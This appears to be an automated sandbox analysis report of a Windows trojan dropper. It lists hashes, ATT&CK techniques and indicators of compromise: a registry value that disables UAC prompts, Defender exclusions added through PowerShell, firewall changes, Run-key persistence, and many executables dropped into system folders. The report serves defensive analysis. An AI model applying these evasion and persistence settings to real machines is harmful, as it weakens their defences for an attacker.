3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
26-11-2024 21:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
Size

5.5MB
MD5

f76848eea998d73bdb1bb808a7526686
SHA1

cce025a7112536ace2f92da5e46828d268339ab7
SHA256

3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf
SHA512

9fd839734326de1dfc9fd144b1fc113be0068185687baafbebed7b7831cdcd322a149f5c3b42c2c37876aec4f510171990d293e864b0907a08b595e5fc4c4da5
SSDEEP

98304:q4sVoAHIDycLz+i0OAy0AZn8YMT40RWVSEOr0mxnmLsP2PUDgCEGYeXIK2hrhKH:tsVtaLCis+RYlRjEcMDP2g7aXI94

Score

10^/10

discovery evasion execution exploit persistence phishing privilege_escalation trojan upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
5764	powershell.exe
1900	powershell.exe
6088	powershell.exe
5184	powershell.exe
5292	powershell.exe
5616	powershell.exe
5656	powershell.exe
5624	powershell.exe
5756	powershell.exe
5948	powershell.exe

Modifies Windows Firewall 2 TTPs 36 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	Process
5368	netsh.exe
3004	netsh.exe
5092	netsh.exe
5744	netsh.exe
5780	netsh.exe
5716	netsh.exe
2784	netsh.exe
1324	netsh.exe
1968	netsh.exe
5284	netsh.exe
6120	netsh.exe
3336	netsh.exe
6108	netsh.exe
4500	netsh.exe
5288	netsh.exe
5716	netsh.exe
4660	netsh.exe
2696	netsh.exe
5220	netsh.exe
5640	netsh.exe
5204	netsh.exe
5160	netsh.exe
6044	netsh.exe
5956	netsh.exe
2740	netsh.exe
6124	netsh.exe
4920	netsh.exe
4704	netsh.exe
5592	netsh.exe
6072	netsh.exe
5508	netsh.exe
4528	netsh.exe
5844	netsh.exe
5176	netsh.exe
5384	netsh.exe
5612	netsh.exe

Possible privilege escalation attempt 13 IoCs

exploit

Processes:

icacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	Process
628	icacls.exe
4976	icacls.exe
1900	takeown.exe
2944	takeown.exe
4440	icacls.exe
6112	icacls.exe
6100	icacls.exe
2608	takeown.exe
2436	icacls.exe
4544	icacls.exe
4696	icacls.exe
736	icacls.exe
2124	icacls.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
A potential corporate email address has been identified in the URL: c@s
phishing

Checks computer location settings 2 TTPs 21 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exehandlersuperdat.exenotif-firts-.exe[email protected]bip39-master-recovery®.exesys-version27'.exesys-networks'.exesecuresatudua-x64.exeacgst-v12.exeappleprocess.exenotif-firts.exe[email protected]c.o.s.r-v9'.exesys-v17'.exekvdb.x64.exetaskhosts.exeserviceapple.exehandler+.exesuperdat.exeacgst-12-qknci.exesshclients.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	handlersuperdat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	notif-firts-.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	[email protected]
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	bip39-master-recovery®.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	sys-version27'.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	sys-networks'.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	securesatudua-x64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	acgst-v12.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	appleprocess.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	notif-firts.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	[email protected]
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	c.o.s.r-v9'.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	sys-v17'.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	kvdb.x64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	taskhosts.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	serviceapple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	handler+.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	superdat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	acgst-12-qknci.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	sshclients.exe

Executes dropped EXE 31 IoCs

Processes:

bip39-master-recovery®.exec.o.s.r-v9'.exesys-version27'.exebip39-master-recover.exesys-v17'.exegithub.exesys-networks'.exesecuresatudua-x64.exekvdb.x64.exeacgst-12-qknci.exegithub.exeacgst-v12.exegetapcc-v+.exegetapcc-v+.exetaskhosts.exeserviceapple.exehandler+.exeskrip.exehandlersuperdat.exeappleprocess.exeget.exesuperdat.exeget.exe[email protected]sshclients.exenotif-firts-.exenotif-firts.exe[email protected]getrunstime.exegetc.o.s.r.exegetc.o.s.r.exe

pid	Process
1020	bip39-master-recovery®.exe
2032	c.o.s.r-v9'.exe
2260	sys-version27'.exe
816	bip39-master-recover.exe
1688	sys-v17'.exe
4980	github.exe
2812	sys-networks'.exe
1980	securesatudua-x64.exe
5372	kvdb.x64.exe
5832	acgst-12-qknci.exe
5872	github.exe
5736	acgst-v12.exe
5128	getapcc-v+.exe
5284	getapcc-v+.exe
5084	taskhosts.exe
5384	serviceapple.exe
5720	handler+.exe
6052	skrip.exe
5708	handlersuperdat.exe
5992	appleprocess.exe
428	get.exe
1844	superdat.exe
5700	get.exe
1896	[email protected]
1892	sshclients.exe
5128	notif-firts-.exe
5552	notif-firts.exe
2172	[email protected]
3500	getrunstime.exe
6020	getc.o.s.r.exe
5248	getc.o.s.r.exe

Modifies file permissions 1 TTPs 13 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exe

pid	Process
2608	takeown.exe
1900	takeown.exe
6100	icacls.exe
628	icacls.exe
736	icacls.exe
2124	icacls.exe
4696	icacls.exe
4976	icacls.exe
2436	icacls.exe
2944	takeown.exe
4440	icacls.exe
6112	icacls.exe
4544	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SmartAudioFilterAgent = "C:\\Windows\\java\\audiocheck.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsTask = "C:\\Windows\\java\\taskhosts.exe"	reg.exe

Drops file in System32 directory 64 IoCs

Processes:

acgst-12-qknci.exeacgst-v12.exe[email protected]attrib.exe3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exec.o.s.r-v9'.exesecuresatudua-x64.exehandler+.exehandlersuperdat.execmd.exeattrib.exegetapcc-v+.execmd.exesys-v17'.exesys-networks'.exe[email protected]github.exeattrib.exesuperdat.exekvdb.x64.exesshclients.exebip39-master-recovery®.exeattrib.exe

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\java\github	acgst-12-qknci.exe
File created	C:\Windows\SysWOW64\java\acgst™.deb	acgst-v12.exe
File created	C:\Windows\SysWOW64\java\sshclients.exe	[email protected]
File opened for modification	C:\Windows\SysWOW64\a_h	attrib.exe
File opened for modification	C:\Windows\SysWOW64\java\c.o.s.r-v9'.exe	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
File opened for modification	C:\Windows\SysWOW64\xml\sys-version27'.exe	c.o.s.r-v9'.exe
File opened for modification	C:\Windows\System32\secure1.bat-del	securesatudua-x64.exe
File opened for modification	C:\Windows\SysWOW64\java	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
File created	C:\Windows\SysWOW64\java\bip39-master-recovery®.exe	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
File created	C:\Windows\SysWOW64\java\handlersuperdat.exe	handler+.exe
File created	C:\Windows\SysWOW64\java\superdat.exe	handlersuperdat.exe
File created	C:\Windows\SysWOW64\java\superdat\-\superdat.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\xml	attrib.exe
File opened for modification	C:\Windows\SysWOW64\java\[email protected]	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
File opened for modification	C:\Windows\System32\exclusions.ini.obsolete	securesatudua-x64.exe
File created	C:\Windows\SysWOW64\java\default.php	getapcc-v+.exe
File created	C:\Windows\System32\exclusions.ini	securesatudua-x64.exe
File created	C:\Windows\System32\secure1.bat-del	securesatudua-x64.exe
File created	C:\Windows\SysWOW64\java\handler+.shanghai	handler+.exe
File opened for modification	C:\Windows\SysWOW64\java\superdat\-\time-2.vbs	cmd.exe
File created	C:\Windows\SysWOW64\java\__tmp_rar_sfx_access_check_240678484	[email protected]
File opened for modification	C:\Windows\SysWOW64\xml	c.o.s.r-v9'.exe
File created	C:\Windows\SysWOW64\java\github	sys-v17'.exe
File created	C:\Windows\SysWOW64\java\acgst-12-qknci.exe	sys-networks'.exe
File created	C:\Windows\SysWOW64\java\applec.o.s.r-™.apx	[email protected]
File created	C:\Windows\SysWOW64\java\handlersuperdatx86x64™.bat	handlersuperdat.exe
File created	C:\Windows\SysWOW64\java\[email protected]	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
File created	C:\Windows\SysWOW64\xml\sys-version27'.exe	c.o.s.r-v9'.exe
File opened for modification	C:\Windows\System32\exclusions.ini	securesatudua-x64.exe
File created	C:\Windows\System32\-.lnk	securesatudua-x64.exe
File created	C:\Windows\SysWOW64\java\Acquisition-clients@ssh™.sh	[email protected]
File created	C:\Windows\System32\securesatudua.bat	securesatudua-x64.exe
File created	C:\Windows\SysWOW64\java\zipped.exe	acgst-v12.exe
File created	C:\Windows\SysWOW64\java\taskhosts.exe	acgst-v12.exe
File opened for modification	C:\Windows\SysWOW64\xml\sys-v17'.exe	c.o.s.r-v9'.exe
File created	C:\Windows\SysWOW64\java\acgst-v12.exe	github.exe
File created	C:\Windows\SysWOW64\java\bip39-master-recover.exe	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
File created	C:\Windows\SysWOW64\xml\__tmp_rar_sfx_access_check_240617781	c.o.s.r-v9'.exe
File created	C:\Windows\SysWOW64\xml\sys-v17'.exe	c.o.s.r-v9'.exe
File opened for modification	C:\Windows\System32\securesatudua.bat	securesatudua-x64.exe
File opened for modification	C:\Windows\SysWOW64\java\github.exe	acgst-12-qknci.exe
File opened for modification	C:\Windows\SysWOW64\java\superdat	attrib.exe
File created	C:\Windows\SysWOW64\java\superdat\-\superdatgeneral™.bat	superdat.exe
File created	C:\Windows\SysWOW64\java\c.o.s.r-v9'.exe	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
File created	C:\Windows\SysWOW64\java\securesatudua-x64.exe	sys-networks'.exe
File created	C:\Windows\SysWOW64\java\securesatudua-x32.exe	sys-networks'.exe
File opened for modification	C:\Windows\SysWOW64\java\superdat\-\time-7.vbs	cmd.exe
File created	C:\Windows\System32\AVWIN.INI	securesatudua-x64.exe
File created	C:\Windows\SysWOW64\java\handler+.exe	acgst-v12.exe
File opened for modification	C:\Windows\SysWOW64\java\superdat\-\time-6.vbs	cmd.exe
File created	C:\Windows\System32\__tmp_rar_sfx_access_check_240624875	securesatudua-x64.exe
File opened for modification	C:\Windows\System32\-.lnk	securesatudua-x64.exe
File created	C:\Windows\SysWOW64\java\settings.kvdb-wal.rpm	kvdb.x64.exe
File opened for modification	C:\Windows\SysWOW64\java\superdat\-\time-5.vbs	cmd.exe
File created	C:\Windows\SysWOW64\java\getrunstime.exe	sshclients.exe
File created	C:\Windows\SysWOW64\java\z.c.o.s.r-v21-ser'-bip39.dat	bip39-master-recovery®.exe
File created	C:\Windows\SysWOW64\java\sys-c.o.s.r-terkunci.exe	sys-v17'.exe
File created	C:\Windows\SysWOW64\java\c.o.s.r-v20'#.dat	sys-networks'.exe
File opened for modification	C:\Windows\SysWOW64\java	attrib.exe
File created	C:\Windows\SysWOW64\java\getc.o.s.r.exe	[email protected]
File created	C:\Windows\SysWOW64\java\kvdb.x32.exe	sys-networks'.exe
File opened for modification	C:\Windows\System32\exceptions.dat	securesatudua-x64.exe
File created	C:\Windows\System32\exclusions.ini.obsolete	securesatudua-x64.exe
File opened for modification	C:\Windows\System32\avgexc.ini	securesatudua-x64.exe

UPX packed file 21 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x0007000000023cc5-295.dat	upx
behavioral2/memory/5128-509-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/5128-520-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/5284-521-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/428-1298-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/428-1487-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/5700-1650-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/5700-1653-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/3500-1690-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/6020-1692-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/6020-1693-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/3500-1694-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/3500-1696-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/6020-1697-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/3500-1698-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/6020-1699-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/3500-1700-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/6020-1701-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/6020-1705-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/5248-1709-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/5248-1710-0x0000000000400000-0x00000000004EF000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

Processes:

cmd.exe

description	ioc	Process
File opened for modification	C:\Program Files\WinRAR\rar.exe	cmd.exe
File created	C:\Program Files\WinRAR\rar.exe	cmd.exe

Drops file in Windows directory 14 IoCs

Processes:

taskhosts.exeserviceapple.exeappleprocess.exeget.exeget.exeskrip.exeattrib.exe

description	ioc	Process
File created	C:\Windows\java\__tmp_rar_sfx_access_check_240654953	taskhosts.exe
File created	C:\Windows\java\skrip.exe	serviceapple.exe
File created	C:\Windows\java\taskhosts10'.cer	appleprocess.exe
File created	C:\Windows\java\audiocheck.php	get.exe
File created	C:\Windows\java\taskhosts10'.apx	appleprocess.exe
File created	C:\Windows\java\taskhosts.php	get.exe
File created	C:\Windows\java\serviceapple.exe	taskhosts.exe
File opened for modification	C:\Windows\java\serviceapple.exe	taskhosts.exe
File created	C:\Windows\java\serviceapplet+bknci'.rpm	serviceapple.exe
File created	C:\Windows\java\appleprocess.exe	skrip.exe
File created	C:\Windows\java\skrip	serviceapple.exe
File opened for modification	C:\Windows\java	attrib.exe
File created	C:\Windows\java\applet+terkunci.exe	serviceapple.exe
File created	C:\Windows\java\get.exe	appleprocess.exe

Launches sc.exe 16 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
3492	sc.exe
3244	sc.exe
5184	sc.exe
4304	sc.exe
4976	sc.exe
5172	sc.exe
4440	sc.exe
4964	sc.exe
1900	sc.exe
4304	sc.exe
5200	sc.exe
3244	sc.exe
2960	sc.exe
1900	sc.exe
4976	sc.exe
3492	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

getrunstime.exefind.exeicacls.execmd.execmd.exePING.EXEtimeout.exefindstr.exesys-networks'.exehandlersuperdat.exefindstr.exefindstr.exe[email protected]PING.EXEsys-version27'.exefind.exeicacls.exeicacls.exesysteminfo.execmd.exetimeout.execmd.exereg.execscript.exefind.exetimeout.exereg.execscript.execscript.exefind.exereg.exePING.EXE3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exegetapcc-v+.execmd.execmd.exetimeout.exeget.exeattrib.execmd.exeicacls.exeget.exeicacls.exetimeout.execmd.exebip39-master-recover.exefindstr.execscript.exebip39-master-recovery®.exefindstr.exefindstr.exereg.exeicacls.execmd.exe[email protected]PING.EXEcscript.exeattrib.exegetc.o.s.r.exesshclients.exefindstr.exereg.exeattrib.exetimeout.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	getrunstime.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sys-networks'.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	handlersuperdat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sys-version27'.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	systeminfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
